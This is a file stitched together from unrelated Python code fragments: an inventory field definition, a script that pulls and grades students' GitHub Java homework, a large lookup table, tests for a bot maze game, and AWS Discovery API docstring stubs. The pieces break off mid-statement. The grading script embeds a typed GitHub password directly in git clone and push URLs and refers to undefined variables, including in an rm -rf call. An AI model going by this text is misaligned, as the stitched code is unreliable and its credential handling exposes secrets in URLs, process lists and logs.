package_id = S3ReusableField("package_id", "reference %s" % tablename,
label = T("Package Type"),
ondelete = "RESTRICT",
represent = represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "inv_package.id",
represent,
orderby = "inv_package.name",
sort = True,
)
),
sortby = "name",
)
# ---------------------------------------------------------------------
# Pass names back to global scope | |
<gh_stars>0
import sys, os, time, subprocess, getpass
from datetime import date
from subprocess import Popen, PIPE, STDOUT
import loadStudents
import argparse
import scorehistory
import javaRun
from shutil import copyfile
# Stuff we need, joy.
PARSER = argparse.ArgumentParser()
PARSER.add_argument("project", help="Github project to pull.")
PARSER.add_argument("-a", "--assignment", help="Assignment within the project.")
PARSER.add_argument("-s", "--student", help="Only on the student specified.")
PARSER.add_argument("-dl", "--dl", help="Skip source DL, use -dl off, defaults to on")
args = PARSER.parse_args()
SHOULD_DL = True
if not args.dl == None:
if args.dl.lower() == "off":
SHOULD_DL = False
if SHOULD_DL:
print("Mode: Download source ON")
else:
print("Mode: Download source OFF")
#If a specific student was specified then only that student will be run
STUDENTS = loadStudents.getStudents(args.student)
#github URL pattern
#https://github.com/SwettSoquelHS/github-proj-stuGuthubuser
#https://github.com/SwettSoquelHS/github-proj-stuGuthubuser.git
HTTPS_STR = "https://"
GITHUB_PROJ_BASE_URL= "github.com/SwettSoquelHS/"
#gitHubDempURL
GITHUB_DEMO_BASE_URL = "swettsoquelhs.github.io/"
OUTPUT_DIR = './stuwork'
REPORT_DIR = './stureports'
TESTS_DIR = './tests'
REPORTS = "github.com/SwettSoquelHS/reports.git"
#assignMent
assignment = args.assignment
#projName
projName = args.project
OK_TO_REUSE = True
stu_to_report = {}
specificUser = None
if len(sys.argv) > 2:
specificUser = sys.argv[2]
#score history
scoreHistory = projName + ".json"
scorehistory.load(scoreHistory)
sysUser = input("Enter the git user:")
sysPwd = getpass.getpass(prompt='Enter github pwd for '+ sysUser +'? ')
if not os.path.exists(REPORT_DIR + "/" +projName):
os.makedirs(REPORT_DIR + "/" +projName)
def gitPull():
if True:
output = subprocess.check_output( ['git','pull'] , cwd=REPORT_DIR,
stderr=subprocess.STDOUT)
def saveReportToGit(stu_to_report, reportFile):
if True:
stuCode = makeProjURL(HTTPS_STR+GITHUB_PROJ_BASE_URL, projName, studentGithubUser)
printToReport(studentReport, "[Attempting DL:" + stuCode + ".git]")
gitURL = HTTPS_STR + sysUser + ":" + sysPwd + "@" + REPORTS
output = subprocess.check_output( ['git','add', "."] , cwd=REPORT_DIR,
stderr=subprocess.STDOUT)
output = subprocess.check_output( ['git','commit', '-m "report check in '+ str(date.today())+'"'] , cwd=REPORT_DIR,
stderr=subprocess.STDOUT)
output = subprocess.check_output( ['git','push', gitURL] , cwd=REPORT_DIR,
stderr=subprocess.STDOUT)
printToReport(studentReport, output.decode("utf-8").replace("\n", "\n\t"))
printToReport(studentReport, "[REPORT DONE]")
#<td>Student Code Base</td><td>Live Demo</td> <td>Report</td>
def printTR(displayCodeBaseStr, codeURL, liveDisplay, liveURL, stuReport, theScore):
result = '<tr><td><a href="' + codeURL + '">' + displayCodeBaseStr + "</a></td>"
if liveDisplay != 'N/A':
result += '<td><a href="' + liveURL +'">' + liveDisplay + '</a></td>'
else:
result += '<td> N/A </td>'
if stuReport is None:
result += '<td> N/A </td>'
else:
result += '<td><a href="'+ stuReport +'">Report Results</a>'
if theScore is None:
result += "</td>"
else:
result += "<td>" + str(theScore) + "</td>"
return result +'</tr>'
def makeProjURL(base, proj, user):
return base + proj + "-" + user
def createClassReport(projName, stu_report_map, liveDemo, scores ):
#scores looks like:
#{'user': { 'assign name': score}}
print("[FINALIZING] Running " + projName + " summary...")
reportFile = projName + ".html"
if not (scores is None):
reportFile = "admin-" + reportFile
reportFile = REPORT_DIR + "/" + reportFile
scoreHeaderStr = ''
if scores is not None:
#{'asianaaron2': {'asignment_1': '0.55'}
for student in scores.keys():
stuScores = scores[student]
for asignmentKey in stuScores.keys():
scoreHeaderStr = scoreHeaderStr + '<td>' + asignmentKey + '</td>'
break
scoreHeaderStr = scoreHeaderStr + "\n"
with open(reportFile , "w") as file:
file.write("<html><head><title>"+projName + " class report</title></head><body>")
file.write("<table><tr><td>Student Code Base</td><td>Live Demo</td> <td>Report</td>")
if scores is None:
file.write(" </tr>")
else:
file.write(scoreHeaderStr + "</tr>")
for student in STUDENTS:
studentGit = student[2]
stuName = student[0]
stuCode = makeProjURL(HTTPS_STR+GITHUB_PROJ_BASE_URL, projName, studentGit)
stuSite ='N/A'
if liveDemo != None:
stuSite = makeProjURL(HTTPS_STR+GITHUB_DEMO_BASE_URL, projName, studentGit)
stuReport = None
if studentGit in stu_report_map.keys():
stuReport = stu_report_map[studentGit]
theScore = None
tdData = ""
if not (scores is None):
cnt = 0;
for asg in scores[studentGit].keys():
theScore = scores[studentGit][asg]
oldScore = scorehistory.getPrevScore(asg, studentGit)
if theScore != oldScore and not(oldScore is None):
theScore = 'WAS: ' + str(oldScore) + ' vs NOW: ' + str(theScore)
if cnt == 0:
tdData = theScore
else:
tdData = tdData + "</td><td>" +theScore
cnt = cnt + 1
#def printTR( display, codeURL, liveDisplay, liveURL, stuReport):
stuRow = printTR(stuName, stuCode, stuSite, stuSite, stuReport, tdData )
file.write(stuRow)
file.write("</table></body><html>")
return reportFile
def printToReport(log_list, message):
print(message)
log_list.append(message)
#writeStudentResultReport(student[2], projName, REPORT_DIR , studentReport)
def writeStudentResultReport(student, project, out_dir, log_data):
reportFile = out_dir+"/" + projName + "/" +student + "." + project + "_results.html"
with open(reportFile , "w") as file_obj:
today = str(date.today())
file_obj.write("<html><head><title>"+project+" status</title></head><body>\n")
file_obj.write("Run date: " + today+"\n<br>")
file_obj.write("Student User: "+ student+"\n<br>")
file_obj.write("Project: " + project+"\n<br>\n<pre>\n")
for logLine in log_data:
file_obj.write(logLine +"\n")
file_obj.write("\n</pre></body></html>")
file_obj.close()
return projName + "/" +student + "." + project + "_results.html"
def checkClean(studentProjectDirectory, studentReport, studentWorkingDirectory):
if not OK_TO_REUSE:
if os.path.exists(studentProjectDirectory):
printToReport(studentReport, "[CLEANUP] Removing project dir: " + studentProjectDirectory)
Popen( ['rm','-rf', stuProj] , cwd=studentWorkingDirectory)
else:
printToReport(studentReport, "[FRESH & CLEAN] @ " + studentProjectDirectory)
else:
if os.path.exists(studentProjectDirectory):
printToReport(studentReport, "[REUSING WORK]: " + studentProjectDirectory)
else:
printToReport(studentReport, "[PRE-WARN]: Expected non-empty: " + studentProjectDirectory)
time.sleep(1.5)
def syncGitBase(projName, studentGithubUser, studentReport, studentWorkingDirectory):
try:
stuCode = makeProjURL(HTTPS_STR+GITHUB_PROJ_BASE_URL, projName, studentGithubUser)
printToReport(studentReport, "[Attempting DL:" + stuCode + ".git]")
gitURL = HTTPS_STR + sysUser + ":" + sysPwd + "@" + makeProjURL(GITHUB_PROJ_BASE_URL, projName, studentGithubUser)+".git"
output = subprocess.check_output( ['git','clone', gitURL] , cwd=studentWorkingDirectory,
stderr=subprocess.STDOUT)
printToReport(studentReport, output.decode("utf-8").replace("\n", "\n\t"))
printToReport(studentReport, "[GITWORK DONE]")
except:
print("Unable to sync for student: " + studentGithubUser + " for project: " + projName)
def tryCompile( studentReport, chapterDir, javaFile):
error_code = 0
printToReport(studentReport, "[COMPILING] " + javaFile)
if os.path.isfile(chapterDir+'/'+ javaFile):
p = Popen(['javac', javaFile], cwd=chapterDir, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
output = p.communicate()[0]
if p.returncode != 0:
printToReport(studentReport,
"\t[ERROR] javac failed " + javaFile + " " + output.decode("utf-8").replace("\n", "\n\t"))
error_code = 1
else:
printToReport(studentReport, "\t[SUCCESSFUL COMPILE] " + javaFile)
else:
printToReport(studentReport, "\t[ERROR] Missing Compile Target:" + javaFile)
error_code = 2
return error_code
def tryRun( studentReport, chapterDir, target):
error_code = 0
#try running
javaClass = target + ".class"
if os.path.isfile(chapterDir+'/'+ javaClass):
printToReport(studentReport, "[RUNNING] " + target + "\n-->")
p = Popen(['java', target], cwd=chapterDir,
stdout=PIPE, stdin=PIPE, stderr=PIPE)
stdout_data = p.communicate(input=b'13\n')
if p.returncode != 0:
printToReport(studentReport, "\t[ERROR] Runtime Error @ java " + target + "\n" +
stdout_data[0].decode("utf-8").replace("\n", "\n\t") )
error_code = 3
else:
printToReport(studentReport, stdout_data[0].decode("utf-8").replace("\n", "\n\t"))
printToReport(studentReport, "<--\n\t[OUTPUT OK]\n" )
else:
error_code = 1
return error_code
def copyTest(TESTS_DIR, chapterDir, testTarget):
javaFile = testTarget + ".java"
if os.path.isfile(TESTS_DIR+'/'+ javaFile):
copyfile(TESTS_DIR+'/'+javaFile, chapterDir + "/" + javaFile )
def handle_think_java( stuProjDir, studentReport, studentGithubUser ):
#Chapter assignments
ch2Descriptor = {
"assignment_dir": "chapter2",
"targets" : ["Date", "Time"], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "COMPILES" #How to verify assignment
}
ch3Descriptor = {
"assignment_dir": "chapter3",
"targets" : ["Exercise3", "Exercise4"], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "COMPILES" #How to verify assignment
}
ch4Descriptor = {
"assignment_dir": "chapter4",
"targets" : ["Multadd"], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "COMPILES" #How to verify assignment
}
ch6Descriptor = {
"assignment_dir": "chapter6",
"targets" : [("Exercise4","Ch6Ex4"), ("Exercise5","Ch6Ex5")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
swetterCise1 = {
"assignment_dir": "chapter6",
"targets" : [("Swettercise1", "SwetterciseTest")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST",
}
ch7DescriptorA = {
"assignment_dir": "chapter7",
"targets" : [("Exercise3","TestCh7Ex3"), ("Exercise4","TestCh7Ex4")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
ch7DescriptorB = {
"assignment_dir": "chapter7",
"targets" : [("Exercise5","TestCh7Ex5"), ("Exercise6","TestCh7Ex6"), ("Exercise8", "TestCh7Ex8")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
ch11Descriptor = {
"assignment_dir": "chapter11",
"targets" : [("Tile","TestTile")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
ch12Descriptor = {
"assignment_dir": "chapter12",
"targets" : [("CheckPokerHands","TestCheckPokerHands")], #Files to look for
"score" : 0.4 , #weight for the assignment
"checkWith": "TEST", #How to verify assignment
}
#Assignments are collection of chapter assignments
think_java_assignments = {
"Think Java: Ch2-ch4" : { #<-- key, value is map
"work": [ch2Descriptor, ch3Descriptor, ch4Descriptor],
"enabled": True,
"desc": "HW1, Ch2-Ch4" },
"Think Java: Ch6" : { #<-- key, value is map
"work": [ch6Descriptor],
"enabled": True,
"desc": "HW2, Ch 6" },
"Swettercise1" : { #<-- key, value is map
"work": [swetterCise1],
"enabled": True,
"desc": "HW3: Third HW Assignment, Swettercise. Assigned with Chapter6 work" },
" Think Java: Ch7 - pt1 " : { #<-- key, value is map
"work": [ch7DescriptorA],
"enabled": True,
"desc": "HW7: Fourth HW Assignment, Ch7 Ex3 & 4" },
" Think Java: Ch7 - pt2 " : | |
8, 3, 5): (0, 1),
(8, 8, 4, -5): (0, 1),
(8, 8, 4, -4): (0, 1),
(8, 8, 4, -3): (0, 1),
(8, 8, 4, -2): (0, 1),
(8, 8, 4, -1): (0, 1),
(8, 8, 4, 0): (0, 1),
(8, 8, 4, 1): (0, 1),
(8, 8, 4, 2): (0, 1),
(8, 8, 4, 3): (0, 1),
(8, 8, 4, 4): (0, 1),
(8, 8, 4, 5): (0, 1),
(8, 8, 5, -5): (0, 1),
(8, 8, 5, -4): (0, 1),
(8, 8, 5, -3): (0, 1),
(8, 8, 5, -2): (0, 1),
(8, 8, 5, -1): (0, 1),
(8, 8, 5, 0): (0, 1),
(8, 8, 5, 1): (0, 1),
(8, 8, 5, 2): (0, 1),
(8, 8, 5, 3): (0, 1),
(8, 8, 5, 4): (0, 1),
(8, 8, 5, 5): (0, 1),
(8, 9, -5, -5): (0, 1),
(8, 9, -5, -4): (0, 1),
(8, 9, -5, -3): (0, 1),
(8, 9, -5, -2): (0, 1),
(8, 9, -5, -1): (0, 1),
(8, 9, -5, 0): (0, 1),
(8, 9, -5, 1): (0, 1),
(8, 9, -5, 2): (0, 1),
(8, 9, -5, 3): (0, 1),
(8, 9, -5, 4): (0, 1),
(8, 9, -5, 5): (0, 1),
(8, 9, -4, -5): (0, 1),
(8, 9, -4, -4): (0, 1),
(8, 9, -4, -3): (0, 1),
(8, 9, -4, -2): (0, 1),
(8, 9, -4, -1): (0, 1),
(8, 9, -4, 0): (0, 1),
(8, 9, -4, 1): (0, 1),
(8, 9, -4, 2): (0, 1),
(8, 9, -4, 3): (0, 1),
(8, 9, -4, 4): (0, 1),
(8, 9, -4, 5): (0, 1),
(8, 9, -3, -5): (0, 1),
(8, 9, -3, -4): (0, 1),
(8, 9, -3, -3): (0, 1),
(8, 9, -3, -2): (0, 1),
(8, 9, -3, -1): (0, 1),
(8, 9, -3, 0): (0, 1),
(8, 9, -3, 1): (0, 1),
(8, 9, -3, 2): (0, 1),
(8, 9, -3, 3): (1, 1),
(8, 9, -3, 4): (1, 1),
(8, 9, -3, 5): (1, 0),
(8, 9, -2, -5): (-1, 1),
(8, 9, -2, -4): (-1, 1),
(8, 9, -2, -3): (-1, 1),
(8, 9, -2, -2): (-1, 1),
(8, 9, -2, -1): (-1, 1),
(8, 9, -2, 0): (1, 1),
(8, 9, -2, 1): (1, 1),
(8, 9, -2, 2): (1, 1),
(8, 9, -2, 3): (1, 1),
(8, 9, -2, 4): (1, 1),
(8, 9, -2, 5): (1, 0),
(8, 9, -1, -5): (-1, 0),
(8, 9, -1, -4): (-1, 1),
(8, 9, -1, -3): (-1, 1),
(8, 9, -1, -2): (-1, 1),
(8, 9, -1, -1): (1, 1),
(8, 9, -1, 0): (1, 1),
(8, 9, -1, 1): (1, 1),
(8, 9, -1, 2): (1, 1),
(8, 9, -1, 3): (1, 1),
(8, 9, -1, 4): (1, 1),
(8, 9, -1, 5): (1, 0),
(8, 9, 0, -5): (1, 1),
(8, 9, 0, -4): (1, 1),
(8, 9, 0, -3): (1, 1),
(8, 9, 0, -2): (1, 1),
(8, 9, 0, -1): (1, 1),
(8, 9, 0, 0): (1, 1),
(8, 9, 0, 1): (0, 1),
(8, 9, 0, 2): (0, 1),
(8, 9, 0, 3): (0, 1),
(8, 9, 0, 4): (0, 1),
(8, 9, 0, 5): (0, 1),
(8, 9, 1, -5): (1, 1),
(8, 9, 1, -4): (1, 1),
(8, 9, 1, -3): (1, 1),
(8, 9, 1, -2): (1, 1),
(8, 9, 1, -1): (0, 1),
(8, 9, 1, 0): (0, 1),
(8, 9, 1, 1): (-1, 1),
(8, 9, 1, 2): (-1, 1),
(8, 9, 1, 3): (-1, 1),
(8, 9, 1, 4): (-1, 1),
(8, 9, 1, 5): (-1, 1),
(8, 9, 2, -5): (0, 1),
(8, 9, 2, -4): (0, 1),
(8, 9, 2, -3): (0, 1),
(8, 9, 2, -2): (0, 1),
(8, 9, 2, -1): (0, 1),
(8, 9, 2, 0): (-1, 1),
(8, 9, 2, 1): (-1, 1),
(8, 9, 2, 2): (-1, 1),
(8, 9, 2, 3): (-1, 1),
(8, 9, 2, 4): (-1, 1),
(8, 9, 2, 5): (-1, 1),
(8, 9, 3, -5): (0, 1),
(8, 9, 3, -4): (0, 1),
(8, 9, 3, -3): (0, 1),
(8, 9, 3, -2): (0, 1),
(8, 9, 3, -1): (0, 1),
(8, 9, 3, 0): (0, 1),
(8, 9, 3, 1): (0, 1),
(8, 9, 3, 2): (0, 1),
(8, 9, 3, 3): (0, 1),
(8, 9, 3, 4): (0, 1),
(8, 9, 3, 5): (0, 1),
(8, 9, 4, -5): (0, 1),
(8, 9, 4, -4): (0, 1),
(8, 9, 4, -3): (0, 1),
(8, 9, 4, -2): (0, 1),
(8, 9, 4, -1): (0, 1),
(8, 9, 4, 0): (0, 1),
(8, 9, 4, 1): (0, 1),
(8, 9, 4, 2): (0, 1),
(8, 9, 4, 3): (0, 1),
(8, 9, 4, 4): (0, 1),
(8, 9, 4, 5): (0, 1),
(8, 9, 5, -5): (0, 1),
(8, 9, 5, -4): (0, 1),
(8, 9, 5, -3): (0, 1),
(8, 9, 5, -2): (0, 1),
(8, 9, 5, -1): (0, 1),
(8, 9, 5, 0): (0, 1),
(8, 9, 5, 1): (0, 1),
(8, 9, 5, 2): (0, 1),
(8, 9, 5, 3): (0, 1),
(8, 9, 5, 4): (0, 1),
(8, 9, 5, 5): (0, 1),
(8, 10, -5, -5): (0, 1),
(8, 10, -5, -4): (0, 1),
(8, 10, -5, -3): (0, 1),
(8, 10, -5, -2): (0, 1),
(8, 10, -5, -1): (0, 1),
(8, 10, -5, 0): (0, 1),
(8, 10, -5, 1): (0, 1),
(8, 10, -5, 2): (0, 1),
(8, 10, -5, 3): (0, 1),
(8, 10, -5, 4): (0, 1),
(8, 10, -5, 5): (0, 1),
(8, 10, -4, -5): (0, 1),
(8, 10, -4, -4): (0, 1),
(8, 10, -4, -3): (0, 1),
(8, 10, -4, -2): (0, 1),
(8, 10, -4, -1): (0, 1),
(8, 10, -4, 0): (0, 1),
(8, 10, -4, 1): (0, 1),
(8, 10, -4, 2): (0, 1),
(8, 10, -4, 3): (0, 1),
(8, 10, -4, 4): (0, 1),
(8, 10, -4, 5): (0, 1),
(8, 10, -3, -5): (0, 1),
(8, 10, -3, -4): (0, 1),
(8, 10, -3, -3): (0, 1),
(8, 10, -3, -2): (0, 1),
(8, 10, -3, -1): (0, 1),
(8, 10, -3, 0): (0, 1),
(8, 10, -3, 1): (0, 1),
(8, 10, -3, 2): (0, 1),
(8, 10, -3, 3): (1, 1),
(8, 10, -3, 4): (1, 1),
(8, 10, -3, 5): (1, 0),
(8, 10, -2, -5): (-1, 1),
(8, 10, -2, -4): (-1, 1),
(8, 10, -2, -3): (-1, 1),
(8, 10, -2, -2): (-1, 1),
(8, 10, -2, -1): (-1, 1),
(8, 10, -2, 0): (1, 1),
(8, 10, -2, 1): (1, 1),
(8, 10, -2, 2): (1, 1),
(8, 10, -2, 3): (1, 1),
(8, 10, -2, 4): (1, 1),
(8, 10, -2, 5): (1, 0),
(8, 10, -1, -5): (-1, 1),
(8, 10, -1, -4): (-1, 1),
(8, 10, -1, -3): (-1, 1),
(8, 10, -1, -2): (-1, 1),
(8, 10, -1, -1): (1, 1),
(8, 10, -1, 0): (1, 1),
(8, 10, -1, 1): (1, 1),
(8, 10, -1, 2): (1, 1),
(8, 10, -1, 3): (1, 1),
(8, 10, -1, 4): (1, 0),
(8, 10, -1, 5): (1, -1),
(8, 10, 0, -5): (1, 1),
(8, 10, 0, -4): (1, 1),
(8, 10, 0, -3): (1, 1),
(8, 10, 0, -2): (1, 1),
(8, 10, 0, -1): (1, 1),
(8, 10, 0, 0): (1, 1),
(8, 10, 0, 1): (0, 1),
(8, 10, 0, 2): (0, 1),
(8, 10, 0, 3): (0, 1),
(8, 10, 0, 4): (0, 0),
(8, 10, 0, 5): (0, -1),
(8, 10, 1, -5): (1, 1),
(8, 10, 1, -4): (1, 1),
(8, 10, 1, -3): (1, 1),
(8, 10, 1, | |
lambda bot, s: (bot.position, s)
parsed_l0 = layout.parse_layout(l0)
for bot in (0, 2):
game_state = setup_game([stopping, stopping], layout_dict=parsed_l0)
game_state['turn'] = bot
# get position of bots 1 (and 3)
kill_position = game_state['bots'][1]
assert kill_position == game_state['bots'][3]
new_state = apply_move(game_state, kill_position)
# team 0 scores twice
assert new_state['score'] == [10, 0]
# bots 1 and 3 are back to origin
assert new_state['bots'][1::2] == [(6, 2), (6, 1)]
parsed_l1 = layout.parse_layout(l1)
for bot in (1, 3):
game_state = setup_game([stopping, stopping], layout_dict=parsed_l1)
game_state['turn'] = bot
# get position of bots 0 (and 2)
kill_position = game_state['bots'][0]
assert kill_position == game_state['bots'][2]
new_state = apply_move(game_state, kill_position)
# team 1 scores twice
assert new_state['score'] == [0, 10]
# bots 0 and 2 are back to origin
assert new_state['bots'][0::2] == [(1, 1), (1, 2)]
def test_suicide():
""" Check that suicide works. """
l0 = """
########
# .. #
#3210 #
########
"""
l1 = """
########
# .. #
# 1032#
########
"""
# dummy bots
stopping = lambda bot, s: (bot.position, s)
parsed_l0 = layout.parse_layout(l0)
for bot in (1, 3):
game_state = setup_game([stopping, stopping], layout_dict=parsed_l0)
game_state['turn'] = bot
# get position of bot 2
suicide_position = game_state['bots'][2]
new_state = apply_move(game_state, suicide_position)
# team 0 scores
assert new_state['score'] == [5, 0]
# # bots 1 and 3 are back to origin
if bot == 1:
assert new_state['bots'][1::2] == [(6, 2), (1, 2)]
elif bot == 3:
assert new_state['bots'][1::2] == [(3, 2), (6, 1)]
parsed_l1 = layout.parse_layout(l1)
for bot in (0, 2):
game_state = setup_game([stopping, stopping], layout_dict=parsed_l1)
game_state['turn'] = bot
# get position of bot 3
suicide_position = game_state['bots'][3]
new_state = apply_move(game_state, suicide_position)
# team 0 scores
assert new_state['score'] == [0, 5]
def test_cascade_kill():
cascade = [
"""
########
#1 ..30#
# 2#
########
""",
"""
########
#0 .. 3#
# 2#
########
########
#1 .. #
# #
########
""",
"""
########
#0 .. 3#
# 1#
########
########
# .. #
# 2#
########
""",
"""
########
#0 .. 3#
#2 1#
########
"""
]
def move(bot, state):
if not bot.is_blue and bot.turn == 1 and bot.round == 1:
return (6, 1)
return bot.position
layouts = [layout.parse_layout(l) for l in cascade]
state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
assert state['bots'] == layouts[0]['bots']
state = game.play_turn(state) # Bot 0 stands
assert state['bots'] == layouts[0]['bots']
state = game.play_turn(state) # Bot 1 stands
state = game.play_turn(state) # Bot 2 stands
state = game.play_turn(state) # Bot 3 moves, kills 0. Bot 0 and 1 are on same spot
assert state['bots'] == layouts[1]['bots']
state = game.play_turn(state) # Bot 0 stands, kills 1. Bot 1 and 2 are on same spot
assert state['bots'] == layouts[2]['bots']
state = game.play_turn(state) # Bot 1 stands, kills 2.
assert state['bots'] == layouts[3]['bots']
def test_cascade_kill_2():
""" Checks that killing occurs only for the bot whose turn it is
or for any bot that this bot moves onto.
If a bot respawns on an enemy, it will only be killed when it is its own
or the enemy’s turn (and neither of them moves).
"""
cascade = [
"""
########
#30.. 2#
#1 #
########
""",
"""
########
#0 .. 2#
#1 #
########
########
# .. 3#
# #
########
""",
"""
########
#0 .. 3#
#1 #
########
########
# .. #
#2 #
########
""",
"""
########
#0 .. 3#
#2 1#
########
"""
]
def move(bot, state):
if bot.is_blue and bot.turn == 0 and bot.round == 1:
return (1, 1)
return bot.position
layouts = [layout.parse_layout(l) for l in cascade]
state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
assert state['bots'] == layouts[0]['bots']
state = game.play_turn(state) # Bot 0 moves, kills 3. Bot 2 and 3 are on same spot
assert state['bots'] == layouts[1]['bots']
state = game.play_turn(state) # Bot 1 stands. Bot 2 and 3 are on same spot
assert state['bots'] == layouts[1]['bots']
state = game.play_turn(state) # Bot 2 stands, gets killed. Bot 1 and 2 are on same spot
assert state['bots'] == layouts[2]['bots']
state = game.play_turn(state) # Bot 3 stands. Bot 1 and 2 are on same spot
assert state['bots'] == layouts[2]['bots']
state = game.play_turn(state) # Bot 0 stands. Bot 1 and 2 are on same spot
assert state['bots'] == layouts[2]['bots']
state = game.play_turn(state) # Bot 1 stands, kills 2.
assert state['bots'] == layouts[3]['bots']
def test_cascade_kill_rescue_1():
""" Checks that killing occurs only for the bot whose turn it is
or for any bot that this bot moves onto.
If a bot respawns on an enemy, it will only be killed when it is its own
or the enemy’s turn (and neither of them moves).
If bot moves before it is the enemy’s turn. Bot is rescued.
"""
cascade = [
"""
########
#30.. 2#
#1 #
########
""",
"""
########
#0 .. 2#
#1 #
########
########
# .. 3#
# #
########
""",
"""
########
#0 ..23#
#1 #
########
"""
]
def move(bot, state):
if bot.is_blue and bot.turn == 0 and bot.round == 1:
return (1, 1)
if bot.is_blue and bot.turn == 1 and bot.round == 1:
return (5, 1)
return bot.position
layouts = [layout.parse_layout(l) for l in cascade]
state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
assert state['bots'] == layouts[0]['bots']
state = game.play_turn(state) # Bot 0 moves, kills 3. Bot 2 and 3 are on same spot
assert state['bots'] == layouts[1]['bots']
state = game.play_turn(state) # Bot 1 stands. Bot 2 and 3 are on same spot
assert state['bots'] == layouts[1]['bots']
state = game.play_turn(state) # Bot 2 moves. Rescues itself
assert state['bots'] == layouts[2]['bots']
def test_cascade_kill_rescue_2():
""" Checks that killing occurs only for the bot whose turn it is
or for any bot that this bot moves onto.
If a bot respawns on an enemy, it will only be killed when it is its own
or the enemy’s turn (and neither of them moves).
If enemy moves before it is the bot’s turn. Bot is rescued.
"""
cascade = [
"""
########
#3 .. #
#10 2#
########
""",
"""
########
#3 .. #
#0 1#
########
########
# .. #
# 2#
########
""",
"""
########
#3 .. #
#0 12#
########
"""
]
def move(bot, state):
if bot.is_blue and bot.turn == 0 and bot.round == 1:
return (1, 2)
if not bot.is_blue and bot.turn == 0 and bot.round == 1:
return (5, 2)
return bot.position
layouts = [layout.parse_layout(l) for l in cascade]
state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
assert state['bots'] == layouts[0]['bots']
state = game.play_turn(state) # Bot 0 moves, kills 1. Bot 1 and 2 are on same spot
assert state['bots'] == layouts[1]['bots']
state = game.play_turn(state) # Bot 1 moves. Bot 2 is rescued.
assert state['bots'] == layouts[2]['bots']
def test_cascade_suicide():
cascade = [
"""
########
#1 ..03#
# 2#
########
""",
"""
########
#0 .. 3#
# 2#
########
########
#1 .. #
# #
########
""",
"""
########
#0 .. 3#
# 1#
########
########
# .. #
# 2#
########
""",
"""
########
#0 .. 3#
#2 1#
########
"""
]
def move(bot, state):
if bot.is_blue and bot.turn == 0 and bot.round == 1:
return (6, 1)
return bot.position
layouts = [layout.parse_layout(l) for l in cascade]
state = setup_game([move, move], max_rounds=5, layout_dict=layout.parse_layout(cascade[0]))
assert state['bots'] == layouts[0]['bots']
state = game.play_turn(state) # Bot 0 moves onto 3. Gets killed. Bot 0 and 1 are on same spot.
assert state['bots'] == layouts[1]['bots']
state = game.play_turn(state) # Bot 1 moves, gets killed. Bot 1 and 2 are on same spot
assert state['bots'] == layouts[2]['bots']
state = game.play_turn(state) # Bot 2 moves, gets killed.
assert state['bots'] == layouts[3]['bots']
def test_moving_through_maze():
test_start = """
######
#0 . #
#.. 1#
#2 3#
###### """
parsed = layout.parse_layout(test_start)
teams = [
stepping_player('>-v>>>-', '-^^->->'),
stepping_player('<<-<<<-', '-------')
]
state = setup_game(teams, layout_dict=parsed, max_rounds=8)
# play first round
for i in range(4):
state = game.play_turn(state)
test_first_round = layout.parse_layout(
""" ######
# 0. #
#..1 #
#2 3#
###### """)
assert test_first_round['bots'] | |
unique identifier that you can use to query the export status.
(string) --
:type maxResults: integer
:param maxResults: The maximum number of results that you want to display as a part of the query.
:type nextToken: string
:param nextToken: A token to get the next set of results. For example, if you specify 100 IDs for DescribeExportConfigurationsRequest$exportIds but set DescribeExportConfigurationsRequest$maxResults to 10, you get results in a set of 10. Use the token in the query to get the next set of 10.
:rtype: dict
:return: {
'exportsInfo': [
{
'exportId': 'string',
'exportStatus': 'FAILED'|'SUCCEEDED'|'IN_PROGRESS',
'statusMessage': 'string',
'configurationsDownloadUrl': 'string',
'exportRequestTime': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
"""
pass
def describe_export_tasks(exportIds=None, maxResults=None, nextToken=None):
"""
Retrieve status of one or more export tasks. You can retrieve the status of up to 100 export tasks.
See also: AWS API Documentation
:example: response = client.describe_export_tasks(
exportIds=[
'string',
],
maxResults=123,
nextToken='string'
)
:type exportIds: list
:param exportIds: One or more unique identifiers used to query the status of an export request.
(string) --
:type maxResults: integer
:param maxResults: The maximum number of volume results returned by DescribeExportTasks in paginated output. When this parameter is used, DescribeExportTasks only returns maxResults results in a single page along with a nextToken response element.
:type nextToken: string
:param nextToken: The nextToken value returned from a previous paginated DescribeExportTasks request where maxResults was used and the results exceeded the value of that parameter. Pagination continues from the end of the previous results that returned the nextToken value. This value is null when there are no more results to return.
:rtype: dict
:return: {
'exportsInfo': [
{
'exportId': 'string',
'exportStatus': 'FAILED'|'SUCCEEDED'|'IN_PROGRESS',
'statusMessage': 'string',
'configurationsDownloadUrl': 'string',
'exportRequestTime': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
"""
pass
def describe_tags(filters=None, maxResults=None, nextToken=None):
"""
Retrieves a list of configuration items that are tagged with a specific tag. Or retrieves a list of all tags assigned to a specific configuration item.
See also: AWS API Documentation
:example: response = client.describe_tags(
filters=[
{
'name': 'string',
'values': [
'string',
]
},
],
maxResults=123,
nextToken='string'
)
:type filters: list
:param filters: You can filter the list using a key -value format. You can separate these items by using logical operators. Allowed filters include tagKey , tagValue , and configurationId .
(dict) --The tag filter. Valid names are: tagKey , tagValue , configurationId .
name (string) -- [REQUIRED]A name of the tag filter.
values (list) -- [REQUIRED]Values for the tag filter.
(string) --
:type maxResults: integer
:param maxResults: The total number of items to return in a single page of output. The maximum value is 100.
:type nextToken: string
:param nextToken: A token to start the list. Use this token to get the next set of results.
:rtype: dict
:return: {
'tags': [
{
